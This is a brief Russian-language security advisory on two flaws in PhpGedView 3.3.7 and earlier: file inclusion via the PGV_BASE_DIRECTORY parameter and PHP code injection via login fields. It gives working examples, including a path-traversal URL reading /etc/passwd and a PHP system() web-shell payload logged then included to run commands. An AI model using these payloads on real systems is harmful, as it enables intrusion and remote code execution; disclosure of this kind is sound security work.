Программа: PhpGedView 3.3.7 и более ранние версии
Обнаруженные Уязвимости позволяют удаленному пользователю получить доступ к
важным данным и выполнить произвольный PHP сценарий на системе.
1. Отсутствует фильтрация входных данных в параметре "PGV_BASE_DIRECTORY" в
сценарии "help_text_vars.php". Удаленный пользователь может подключить
произвольные файлы на системе. Удачная эксплуатация уязвимости возможна при
включено опции "register_globals".
Пример:
http://[target]/[path]/help_text_vars.php? PGV_BASE_DIRECTORY=../../../../../../../etc/passwd
2. Уязвимость существует из-за недостаточной обработки входных данных в
параметрах "user_language", "user_email" и "user_gedcomid" в сценарии "authenticate.php".
Удаленный пользователь может выполнить произвольный PHP код на системе. Для
удачной эксплуатации уязвимости требуется, чтобы опция "magic_quotes_gpc" была
отключена.
Пример:
Пытаемся войти в систему таким образом:
username: <?php system($_GET[cmd]);?>
password: [nothing]
Затем:
http://[target]/[path]/help_text_vars.php?cmd=ls%20-la& PGV_BASE_DIRECTORY=./index/pgv-200512.log